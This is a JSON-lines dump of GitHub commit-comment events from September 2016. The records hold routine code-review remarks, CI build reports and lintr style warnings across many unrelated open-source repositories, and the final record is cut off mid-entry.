{"id":"4601061548","type":"CommitCommentEvent","actor":{"login":"laughingowl"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19126500,"position":null,"line":null,"path":null,"commit_id":"959c2d264f5d976f087c8682776cd8bd7c32ea9e","created_at":"2016-09-22T08:29:10Z","updated_at":"2016-09-22T08:29:10Z","body":"Dang I so want one (even if proper stats)...  but no way I cna clear the 8 adults spawns that were up to see if I can get a baby to spawn.   Were you able to clear adults Merk444 or jsut lucky on a baby spawn?"}},"created_at":"2016-09-22T08:29:10Z"}
{"id":"4601062505","type":"CommitCommentEvent","actor":{"login":"peti"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19126503,"position":null,"line":null,"path":null,"commit_id":"01e44ac1f9af1d42ee9b5000426b780f2a03c948","created_at":"2016-09-22T08:29:22Z","updated_at":"2016-09-22T08:29:22Z","body":"> We could bring back emacs24 for the time being, but I fear that this will ultimately lead to nixpkgs supporting every past software release ever.\r\n\r\nI don't believe that."}},"created_at":"2016-09-22T08:29:22Z"}
{"id":"4601062542","type":"CommitCommentEvent","actor":{"login":"jmagraner"},"repo":{"name":"wittawatj/gatsby-bootcamp-2016"},"payload":{"comment":{"id":19126504,"position":null,"line":null,"path":null,"commit_id":"5455da5ab8a74c75e5b842a26447cf689b8c3b3c","created_at":"2016-09-22T08:29:23Z","updated_at":"2016-09-22T08:29:23Z","body":"Eszter wrote it yesterday. Just note, the likelihood evaluation can be problematic (goes to -inf) because of this term.\r\nnp.log((d_t1<max_t)*(d_t1>min_t)*1./(max_t-min_t)))\r\nI was testing it yesterday,and for a \"suitable\" range of testing parameters C,D this can be avoid. This range, however, is really small, specially for D, but we can simply fix C-D and let the students do the parameter swift with A-B.\r\nAbout the visibility of the true parameters, can we create a private repo, and put there the data generating script?"}},"created_at":"2016-09-22T08:29:23Z"}
{"id":"4601062788","type":"CommitCommentEvent","actor":{"login":"korsuk"},"repo":{"name":"albatStudio/happyBaby"},"payload":{"comment":{"id":19126506,"position":null,"line":null,"path":null,"commit_id":"481e00100302fc1b83b1ced9249634edaecc754a","created_at":"2016-09-22T08:29:27Z","updated_at":"2016-09-22T08:29:27Z","body":"쿼리 잘못잔겨?"}},"created_at":"2016-09-22T08:29:27Z"}
{"id":"4601067290","type":"CommitCommentEvent","actor":{"login":"LouiLam"},"repo":{"name":"LouiLam/LittleGame"},"payload":{"comment":{"id":19126516,"position":1,"line":1,"path":"ChairSwitch","commit_id":"31833f145e76d2cbd0eb15647748b91b58bd6c3d","created_at":"2016-09-22T08:30:29Z","updated_at":"2016-09-22T08:30:29Z","body":"请注意服务端的椅子号是递增的，不是递减"}},"created_at":"2016-09-22T08:30:29Z"}
{"id":"4601067873","type":"CommitCommentEvent","actor":{"login":"MashaM38"},"repo":{"name":"MashaM38/MMendeleva_Java_Test"},"payload":{"comment":{"id":19126519,"position":23,"line":33,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/tests/GroupDeletionTests.java","commit_id":"855d1621efedc291b009e08c022d496d326eca9b","created_at":"2016-09-22T08:30:35Z","updated_at":"2016-09-22T08:30:35Z","body":"Нужно уточнить баг ли это, точно не знаю"}},"created_at":"2016-09-22T08:30:35Z"}
{"id":"4601068940","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126520,"position":null,"line":null,"path":null,"commit_id":"c4a222b538420a10f05b14ef5d4f97c15b029210","created_at":"2016-09-22T08:30:49Z","updated_at":"2016-09-22T08:30:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1092](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13833&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 249, ignored: 3 Build time: 00:11:42"}},"created_at":"2016-09-22T08:30:49Z"}
{"id":"4601074300","type":"CommitCommentEvent","actor":{"login":"njtierney"},"repo":{"name":"Robinlovelace/efficientR"},"payload":{"comment":{"id":19126533,"position":null,"line":null,"path":null,"commit_id":"a309c2eafae4f0a56be5e12f08d62a4a38d1bab2","created_at":"2016-09-22T08:32:05Z","updated_at":"2016-09-22T08:32:05Z","body":"Looking forward to reading the rest of the book! "}},"created_at":"2016-09-22T08:32:05Z"}
{"id":"4601077730","type":"CommitCommentEvent","actor":{"login":"pedronis"},"repo":{"name":"absoludity/snapd"},"payload":{"comment":{"id":19126540,"position":22,"line":282,"path":"overlord/snapstate/snapmgr_test.go","commit_id":"19e3b4a5989b8759db3667c3d7c70d84d2a7f80b","created_at":"2016-09-22T08:32:54Z","updated_at":"2016-09-22T08:32:54Z","body":"that stuff comes from backend_test.go, various ways to cheat there"}},"created_at":"2016-09-22T08:32:54Z"}
{"id":"4601078927","type":"CommitCommentEvent","actor":{"login":"klngwll"},"repo":{"name":"libris/definitions"},"payload":{"comment":{"id":19126542,"position":null,"line":null,"path":null,"commit_id":"97055b4ea20281107da8a67d6e995ea161836c8f","created_at":"2016-09-22T08:33:11Z","updated_at":"2016-09-22T08:33:11Z","body":"Bra jobbat"}},"created_at":"2016-09-22T08:33:11Z"}
{"id":"4601079316","type":"CommitCommentEvent","actor":{"login":"BZBaXraM"},"repo":{"name":"offensive-security/kali-nethunter"},"payload":{"comment":{"id":19126544,"position":null,"line":null,"path":null,"commit_id":"df196f569ce94be343bf68f7443d99b4f96d5a06","created_at":"2016-09-22T08:33:16Z","updated_at":"2016-09-22T08:33:16Z","body":"Dear developers please build Nethunter 3.0 for Samsung Galaxy Tab 3.8.0 SM T311. "}},"created_at":"2016-09-22T08:33:16Z"}
{"id":"4601080658","type":"CommitCommentEvent","actor":{"login":"pedronis"},"repo":{"name":"absoludity/snapd"},"payload":{"comment":{"id":19126545,"position":21,"line":90,"path":"overlord/snapstate/snapstate.go","commit_id":"19e3b4a5989b8759db3667c3d7c70d84d2a7f80b","created_at":"2016-09-22T08:33:34Z","updated_at":"2016-09-22T08:33:34Z","body":"I don't understand the question"}},"created_at":"2016-09-22T08:33:34Z"}
{"id":"4601087235","type":"CommitCommentEvent","actor":{"login":"pedronis"},"repo":{"name":"absoludity/snapd"},"payload":{"comment":{"id":19126561,"position":54,"line":122,"path":"overlord/snapstate/snapstate.go","commit_id":"19e3b4a5989b8759db3667c3d7c70d84d2a7f80b","created_at":"2016-09-22T08:35:04Z","updated_at":"2016-09-22T08:35:04Z","body":"is best if we can avoid to land this kind of code because using different tasks actually make life more complicated, tasks may persist for a while in state and then we need to deal with variants with migrations"}},"created_at":"2016-09-22T08:35:04Z"}
{"id":"4601088723","type":"CommitCommentEvent","actor":{"login":"MashaM38"},"repo":{"name":"MashaM38/MMendeleva_Java_Test"},"payload":{"comment":{"id":19126566,"position":32,"line":32,"path":"addressbook-web-tests/src/test/java/ru/stqa/pft/addressbook/tests/GroupModificationTests.java","commit_id":"855d1621efedc291b009e08c022d496d326eca9b","created_at":"2016-09-22T08:35:26Z","updated_at":"2016-09-22T08:35:26Z","body":"Возможно это баг, нужно уточнить"}},"created_at":"2016-09-22T08:35:26Z"}
{"id":"4601089753","type":"CommitCommentEvent","actor":{"login":"ljy00ljy"},"repo":{"name":"ljy00ljy/cf_team5"},"payload":{"comment":{"id":19126569,"position":null,"line":null,"path":null,"commit_id":"f68137ac01094f9a7aeb49b998dd3eecc2b8650e","created_at":"2016-09-22T08:35:40Z","updated_at":"2016-09-22T08:35:40Z","body":"dd"}},"created_at":"2016-09-22T08:35:40Z"}
{"id":"4601090363","type":"CommitCommentEvent","actor":{"login":"acka47"},"repo":{"name":"hbz/lobid-rdf-to-json"},"payload":{"comment":{"id":19126572,"position":null,"line":null,"path":null,"commit_id":"7266cff68e069a4385e1c0bd15497f36d02c48d7","created_at":"2016-09-22T08:35:49Z","updated_at":"2016-09-22T08:35:49Z","body":"You added properties that were added before 5feaf6f with another commit, thus resulting in duplicates:\r\n\r\n- `isSupplementTo`\r\n- `thesisInformation`\r\n- `hasSupplement`\r\n"}},"created_at":"2016-09-22T08:35:49Z"}
{"id":"4601101017","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19126597,"position":null,"line":null,"path":null,"commit_id":"be49ee5145169a92fd9fc06827a1e6ba7ca0385b","created_at":"2016-09-22T08:38:14Z","updated_at":"2016-09-22T08:38:14Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1195 of 1195 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-be49ee5145169a92fd9fc06827a1e6ba7ca0385b-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.13%25-green.svg)</a>\n"}},"created_at":"2016-09-22T08:38:14Z"}
{"id":"4601102405","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126602,"position":24,"line":115,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:38:34Z","updated_at":"2016-09-22T08:38:34Z","body":"if there is no year just delete the field, LaTeX/biblatex will take care of these cases. "}},"created_at":"2016-09-22T08:38:34Z"}
{"id":"4601103187","type":"CommitCommentEvent","actor":{"login":"ebfe"},"repo":{"name":"voidlinux/void-packages"},"payload":{"comment":{"id":19126607,"position":null,"line":null,"path":null,"commit_id":"b5819318f0a114b981b633f726993742a3b3cd04","created_at":"2016-09-22T08:38:45Z","updated_at":"2016-09-22T08:38:45Z","body":"There currently is a problem with previously built packages dissapearing/no longer seen by the builders on aarch64."}},"created_at":"2016-09-22T08:38:45Z"}
{"id":"4601104940","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126612,"position":55,"line":316,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:39:11Z","updated_at":"2016-09-22T08:39:11Z","body":"always put in only the year, `a` or `b` and so on will be inserted by biblatex automatically.  "}},"created_at":"2016-09-22T08:39:11Z"}
{"id":"4601106313","type":"CommitCommentEvent","actor":{"login":"gromakovsky"},"repo":{"name":"serokell/time-warp"},"payload":{"comment":{"id":19126615,"position":6,"line":31,"path":"src/Control/TimeWarp/Rpc/MonadRpc.hs","commit_id":"e61848c67ac258e4e6272e3966a52f062acdba32","created_at":"2016-09-22T08:39:31Z","updated_at":"2016-09-22T08:39:31Z","body":"Please use new version of `.stylish-haskell.yaml`."}},"created_at":"2016-09-22T08:39:31Z"}
{"id":"4601107454","type":"CommitCommentEvent","actor":{"login":"cmarinbe"},"repo":{"name":"MartinoBorsato/HOPdiscussion"},"payload":{"comment":{"id":19126616,"position":null,"line":null,"path":null,"commit_id":"27db49f3a996da2076bccd57b681622849f863d5","created_at":"2016-09-22T08:39:46Z","updated_at":"2016-09-22T08:39:46Z","body":"Thanks for implementing the different options and the comments! Some thought below:\r\n\r\n* Completely agree that using the PDG J/Psi mass is not a general option. Although it might be the best one when a real J/Psi is present. Unfortunately we cannot know this without further input (more on this at the end).\r\n* I also agree that using the reconstructed J/Psi mass is not very coherent. The idea was to somehow use the information you gain from the vertex fit on the di-electron system. But indeed the reconstructed mass was obtained from the uncorrected momenta, so we know it misses some energy. \r\n* We were also checking the HopMee (in the case we correct the electron momenta directly). I'm not sure if it would always provide more discrimination power, but the current tool computes it and fills it to the ntuple so it is available for the user.\r\n\r\nSo right now I think the more conservative option is to correct the electron momentum as you were originally doing.\r\n\r\nFor an intermediate future, a nice option would be to allow the user to configure the tool selecting which particles should be the correction applied to. This will be useful in the case of a real J/Psi for example. And also to select which particles should be used to compute the correction. This would allow for instance to use the tool for decays with calo photons in the final state as well.\r\n\r\nBut for now I think **we should focus on having a first version working and released**. And then probably get some feedback from users and decide which configuration options should be given.\r\n\r\n "}},"created_at":"2016-09-22T08:39:46Z"}
{"id":"4601107815","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126617,"position":25,"line":117,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:39:51Z","updated_at":"2016-09-22T08:39:51Z","body":"there was a missing `,` that is why it didnt compile with biber properly."}},"created_at":"2016-09-22T08:39:51Z"}
{"id":"4601108958","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126620,"position":121,"line":671,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:40:07Z","updated_at":"2016-09-22T08:40:07Z","body":"year is wrong."}},"created_at":"2016-09-22T08:40:07Z"}
{"id":"4601109583","type":"CommitCommentEvent","actor":{"login":"mattfullerton"},"repo":{"name":"okfde/2030-watch.de"},"payload":{"comment":{"id":19126624,"position":null,"line":null,"path":null,"commit_id":"d9bfd8a4ce2aa66b5d039f47c728db26ef7fd0a9","created_at":"2016-09-22T08:40:15Z","updated_at":"2016-09-22T08:40:15Z","body":"It was a lot of work to even get that much usability on the menu item :smile: \r\n\r\n@ClaudiaSchwegmann Could you live with a sort of label style button (that isn't actually a button, if you know what I mean) to the right of Über Uns with similar styling?"}},"created_at":"2016-09-22T08:40:15Z"}
{"id":"4601109894","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19126627,"position":null,"line":null,"path":null,"commit_id":"168f5ab4bcc8d1e566880afd9584c9ef946248af","created_at":"2016-09-22T08:40:19Z","updated_at":"2016-09-22T08:40:19Z","body":"Initial commit."}},"created_at":"2016-09-22T08:40:19Z"}
{"id":"4601110277","type":"CommitCommentEvent","actor":{"login":"MrWooJ"},"repo":{"name":"Flieral/Logger-Service"},"payload":{"comment":{"id":19126629,"position":10,"line":10,"path":"actions/MonitorList.js","commit_id":"e76f7c80a9d8d2a90ff6a48f9f203ada87de04ab","created_at":"2016-09-22T08:40:25Z","updated_at":"2016-09-22T08:40:25Z","body":"@mohoma As you mentioned, You are developing `monitorList`, So the exports module should be same as your action name, Means `monitorModel`."}},"created_at":"2016-09-22T08:40:25Z"}
{"id":"4601112537","type":"CommitCommentEvent","actor":{"login":"Tee7even"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":19126632,"position":5,"line":126,"path":"api/src/main/java/com/voxelwind/api/server/event/block/BlockReplaceEvent.java","commit_id":"fe8d1cebd2aa3a61216b81524f39d76aea5ac99d","created_at":"2016-09-22T08:40:57Z","updated_at":"2016-09-22T08:40:57Z","body":"If everyone thought about everything the way you think about this, no \"ugly\nabstractions\" would be invented at all - flippping switches on the\ncomputer's front panel is enough and really clear. While I can agree that\n\"Cancellable\" is not applicable in this exact case (since one event can be\n\"Cancellable\" and have more results at the same time, having an enum is the\nbottleneck here), I'm just trying to say that any way to not repeat\nyourself would be neater.\n\n22 сент. 2016 г. 5:10 пользователь \"Tux\" <notifications@github.com> написал:\n\n> I like what I am doing as it is clear as to what is being done.\n>\n> In my opinion, Cancellable is an ugly abstraction.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/minecrafter/voxelwind/commit/fe8d1cebd2aa3a61216b81524f39d76aea5ac99d#commitcomment-19123531>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGc0WspeYvkn7bqydcHSJdHobpLDB2vVks5qsdWRgaJpZM4KCwZ->\n> .\n>\n"}},"created_at":"2016-09-22T08:40:57Z"}
{"id":"4601112696","type":"CommitCommentEvent","actor":{"login":"W4lly63"},"repo":{"name":"W4lly63/HEARTHQUAKE-MISSION-MOD"},"payload":{"comment":{"id":19126634,"position":null,"line":null,"path":null,"commit_id":"eb06e0189c210f4f924f69936ded2d530b59ee58","created_at":"2016-09-22T08:41:00Z","updated_at":"2016-09-22T08:41:00Z","body":"updated wrong version"}},"created_at":"2016-09-22T08:41:00Z"}
{"id":"4601113742","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126635,"position":103,"line":635,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:41:14Z","updated_at":"2016-09-22T08:41:14Z","body":"you can add a `\\` or `{}` to get a space, sometimes this is needed especially after `\\BC` or `\\AD` (although I recoded it with `\\xspace` - dont ask me why it is still deleting the space)."}},"created_at":"2016-09-22T08:41:14Z"}
{"id":"4601114350","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126637,"position":130,"line":790,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:41:22Z","updated_at":"2016-09-22T08:41:22Z","body":"year is wrong."}},"created_at":"2016-09-22T08:41:22Z"}
{"id":"4601114899","type":"CommitCommentEvent","actor":{"login":"LukasCBossert"},"repo":{"name":"LukasCBossert/ijsra"},"payload":{"comment":{"id":19126638,"position":139,"line":811,"path":"2016-02/content/Raza.tex","commit_id":"7bebf36ee3d5693b6c22b729e3dd22433ec01fac","created_at":"2016-09-22T08:41:29Z","updated_at":"2016-09-22T08:41:29Z","body":"year is wrong."}},"created_at":"2016-09-22T08:41:29Z"}
{"id":"4601114908","type":"CommitCommentEvent","actor":{"login":"MrWooJ"},"repo":{"name":"Flieral/Logger-Service"},"payload":{"comment":{"id":19126639,"position":12,"line":12,"path":"actions/MonitorList.js","commit_id":"e76f7c80a9d8d2a90ff6a48f9f203ada87de04ab","created_at":"2016-09-22T08:41:30Z","updated_at":"2016-09-22T08:41:30Z","body":"Also, According to my top comment, You should set name property value to same as your action name, Means `monitorLisr`"}},"created_at":"2016-09-22T08:41:30Z"}
{"id":"4601121898","type":"CommitCommentEvent","actor":{"login":"absoludity"},"repo":{"name":"absoludity/snapd"},"payload":{"comment":{"id":19126648,"position":21,"line":90,"path":"overlord/snapstate/snapstate.go","commit_id":"19e3b4a5989b8759db3667c3d7c70d84d2a7f80b","created_at":"2016-09-22T08:43:06Z","updated_at":"2016-09-22T08:43:06Z","body":"@pedronis Basically, is snapst.LastIndex(curInfo.Revision) always going to be non-zero (ie. found). I assume so."}},"created_at":"2016-09-22T08:43:06Z"}
{"id":"4601123820","type":"CommitCommentEvent","actor":{"login":"absoludity"},"repo":{"name":"absoludity/snapd"},"payload":{"comment":{"id":19126650,"position":54,"line":122,"path":"overlord/snapstate/snapstate.go","commit_id":"19e3b4a5989b8759db3667c3d7c70d84d2a7f80b","created_at":"2016-09-22T08:43:33Z","updated_at":"2016-09-22T08:43:33Z","body":"Yep, no problem not landing anything in this direction yet."}},"created_at":"2016-09-22T08:43:33Z"}
{"id":"4601124251","type":"CommitCommentEvent","actor":{"login":"yasu80"},"repo":{"name":"yasu80/dotfiles"},"payload":{"comment":{"id":19126652,"position":null,"line":null,"path":null,"commit_id":"1cf9ea575ba99450b7311cbacb43382d6626e361","created_at":"2016-09-22T08:43:39Z","updated_at":"2016-09-22T08:43:39Z","body":"@forno \r\n(aliasのname側に空白が入らないが為の苦肉の策だったなんて言えない)"}},"created_at":"2016-09-22T08:43:39Z"}
{"id":"4601125936","type":"CommitCommentEvent","actor":{"login":"stinos"},"repo":{"name":"micropython/micropython"},"payload":{"comment":{"id":19126658,"position":null,"line":null,"path":null,"commit_id":"bb954d80a4bd467fc321df90cea2b248a90d1570","created_at":"2016-09-22T08:44:01Z","updated_at":"2016-09-22T08:44:01Z","body":"Actualy the problem is only in the debug builds (and only on the travis machine until now, though I only tried on two other pc's), not in release builds. Now I don't really know where to start looking, i.e. is the problem in the code generated or is it rather in the parsing of the output, or both?\r\n\r\nHere's the last part of the bytecode/args output for ```f```, before being parsed by run-tests:\r\n```\r\n<snip>\r\n 06 00 32 1b 0e 32 44 11 3e 41 81 23 10 1a 10 62\r\n 30 d2 16 01 01 cd 80 11 68 83 5a c0 80 16 83 5b\r\n 50 01 68 83 5a 69 83 5b 23 0e 32 80 16 02 50 01\r\n 68 83 5a 6a 5c 00 81 5c 01 11 5b 81 5b\r\narg names:\r\n(N_STATE 22)\r\n(N_EXC_STACK 2)\r\n(INIT_CELL 14)\r\n(INIT_CELL 15)\r\n(INIT_CELL 16)\r\n  bc=-4 line=1\r\n```\r\n\r\nSo the .exp file wants to skip everything until ```\\.\\+5b```, but the third last line happens to match as well. This already explains why the bytecode is present in the .out file - again, no idea if the parsing has to be fixed or the generated bytecode is not ok.\r\n\r\nThe second problem definitely seems parsing-related, this is the parsed .out part for arg_names:\r\n```\r\narg names:\r\n(N_STATE 22)\r\n(N_EXC_STACK 2)\r\n(INIT_CELL 14)\r\n(INIT_CELL 15)\r\n########\r\n  bc=\\\\d\\+ line=118\r\n```\r\nI don't know why it skips the ```(INIT_CELL 16)``` and ```bc=-4 line=1``` lines.\r\n"}},"created_at":"2016-09-22T08:44:01Z"}
{"id":"4601126517","type":"CommitCommentEvent","actor":{"login":"throni3git"},"repo":{"name":"mrdoob/three.js"},"payload":{"comment":{"id":19126659,"position":null,"line":null,"path":null,"commit_id":"7e47e4163b0af042d746f212f873a350211badff","created_at":"2016-09-22T08:44:09Z","updated_at":"2016-09-22T08:44:09Z","body":":D i have no code to commit, so the word \"push\" maybe was a bit wrong in my last post. I thought, you had an implementation ready ?!"}},"created_at":"2016-09-22T08:44:09Z"}
{"id":"4601129008","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19126666,"position":null,"line":null,"path":null,"commit_id":"1e4079292826c51ce8e2a03ec2a861d4bf89535d","created_at":"2016-09-22T08:44:42Z","updated_at":"2016-09-22T08:44:42Z","body":"Initial commit."}},"created_at":"2016-09-22T08:44:42Z"}
{"id":"4601135223","type":"CommitCommentEvent","actor":{"login":"eregon"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19126686,"position":8,"line":268,"path":"truffle/src/main/java/org/jruby/truffle/core/hash/HashNodes.java","commit_id":"457ca026861f7ac716f9508b50711f45e6710660","created_at":"2016-09-22T08:46:04Z","updated_at":"2016-09-22T08:46:04Z","body":"MRI doesn't need this special case because they mostly don't have boxed primitives (maybe just Float) but rather tagged pointers. The second code link is mostly just a fast path (although it also affects semantics)."}},"created_at":"2016-09-22T08:46:04Z"}
{"id":"4601136890","type":"CommitCommentEvent","actor":{"login":"Hegenov"},"repo":{"name":"GluuFederation/oxTrust"},"payload":{"comment":{"id":19126691,"position":null,"line":null,"path":null,"commit_id":"1b7fcc3a8b7ddf038f6303ef074b6c76e36e270e","created_at":"2016-09-22T08:46:26Z","updated_at":"2016-09-22T08:46:26Z","body":"thanks for fix but what about values from Gluu panel? there is no validation so i can put any value despite attribute type. Will it be changed in the future?"}},"created_at":"2016-09-22T08:46:26Z"}
{"id":"4601137165","type":"CommitCommentEvent","actor":{"login":"egov-systems"},"repo":{"name":"egovernments/eGov"},"payload":{"comment":{"id":19126693,"position":8,"line":409,"path":"egov/egov-ptisweb/src/main/java/org/egov/ptis/actions/transfer/PropertyTransferAction.java","commit_id":"262615400eca2500b67033a9725ab3d1265a638f","created_at":"2016-09-22T08:46:30Z","updated_at":"2016-09-22T08:46:30Z","body":"equalsIgnoreCase is less efficient when compared to equals. equalsIgnoreCase should only be used when you are uncertain about the argument case. \r\nHere `propertyMutation.getType().equalsIgnoreCase(ADDTIONAL_RULE_FULL_TRANSFER)`\r\nhope the return value of `propertyMutation.getType()` is a certain letter case so its better to use equals instead of equalsIgnoreCase\r\n"}},"created_at":"2016-09-22T08:46:30Z"}
{"id":"4601137461","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126694,"position":null,"line":null,"path":null,"commit_id":"6fa64b88f28b5ced83e073dca3b036120cbf62a2","created_at":"2016-09-22T08:46:35Z","updated_at":"2016-09-22T08:46:35Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1093](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13837&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 251, ignored: 3 Build time: 00:11:03"}},"created_at":"2016-09-22T08:46:35Z"}
{"id":"4601140113","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19126699,"position":null,"line":null,"path":null,"commit_id":"65abb1695867f588196461e302fce1968fc73e46","created_at":"2016-09-22T08:47:10Z","updated_at":"2016-09-22T08:47:10Z","body":"Initial commit."}},"created_at":"2016-09-22T08:47:10Z"}
{"id":"4601140624","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126701,"position":null,"line":null,"path":null,"commit_id":"aae0e95f7486847390320bb564f1ad69693a64c2","created_at":"2016-09-22T08:47:17Z","updated_at":"2016-09-22T08:47:17Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1094](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13842&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T08:47:17Z"}
{"id":"4601145983","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19126713,"position":null,"line":null,"path":null,"commit_id":"4bacb097a5e29de60c819a306ebef0c69670bcaf","created_at":"2016-09-22T08:48:27Z","updated_at":"2016-09-22T08:48:27Z","body":"[R/calcSumKDA2.R:1:1:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L1) *style:* **Variable and function names should be all lowercase.**\n```r\n​calcSumKDA2 <- function(S, N, I, theta, KDA) {\n^~~~~~~~~~~\n```\n[R/calcSumKDA2.R:4:20:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L4) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  results <- matrix( 0, nrow = s, ncol = 1)\n                   ^\n```\n[R/calcSumKDA2.R:7:28:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L7) *style:* **Put spaces around all infix operators.**\n```r\n​    outcomes <- KDA[numbers+1] + (log(I[i]) * numbers)  -\n                          ~^~\n```\n[R/calcSumKDA2.R:8:7:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n      ^\n```\n[R/calcSumKDA2.R:8:15:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n              ^\n```\n[R/calcSumKDA2.R:8:32:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                               ^\n```\n[R/calcSumKDA2.R:8:50:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L8) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                 ^\n```\n[R/calcSumKDA2.R:8:52:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L8) *style:* **Trailing whitespace is superfluous.**\n```r\n​      ( lgamma( theta + numbers ) - lgamma(theta) ) \n                                                   ^\n```\n[R/calcSumKDA2.R:10:19:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                  ^\n```\n[R/calcSumKDA2.R:10:29:](https://github.com/thijsjanzen/GUILDS/blob/4bacb097a5e29de60c819a306ebef0c69670bcaf/R/calcSumKDA2.R#L10) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    log_max <- max( outcomes )\n                            